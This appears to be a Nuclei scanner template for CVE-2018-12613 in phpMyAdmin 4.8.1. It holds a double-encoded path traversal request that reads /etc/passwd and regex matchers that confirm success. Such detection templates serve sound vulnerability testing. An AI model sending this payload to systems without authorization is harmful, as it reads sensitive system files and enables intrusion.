26 lines
539 B
YAML
26 lines
539 B
YAML
|
id: CVE-2018-12613
|
||
|
|
||
|
info:
|
||
|
name: PhpMyAdmin 4.8.1 Remote File Inclusion
|
||
|
author: pikpikcu
|
||
|
severity: critical
|
||
|
reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
|
||
|
tags: cve,cve2018,phpmyadmin,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0"
|
||
|
part: body
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|